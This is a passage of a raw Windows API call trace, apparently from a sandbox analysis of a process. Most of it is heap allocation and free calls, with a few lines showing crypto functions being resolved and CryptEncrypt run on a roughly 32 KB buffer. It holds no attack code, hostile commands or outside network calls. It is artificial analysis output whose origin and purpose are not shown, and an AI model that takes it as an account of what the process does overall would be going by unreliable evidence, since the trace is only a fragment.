dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0128.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0128.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0128.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0128.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0128.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0128.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0128.079] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0128.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0128.080] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e28b0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e28b0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.082] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.082] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0128.082] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0128.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0128.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0128.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0128.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.085] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.086] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x7ee3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x7ef0) returned 1 [0128.086] CharLowerBuffW (in: lpsz="byte[32497]", cchLength=0xb | out: lpsz="byte[32497]") returned 0xb [0128.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.086] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c1ce0*, pdwDataLen=0x144e790*=0x7ee3, dwBufLen=0x7ef0 | out: pbData=0x49c1ce0*, pdwDataLen=0x144e790*=0x7ef0) returned 1 [0128.086] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.086] CharUpperBuffW (in: 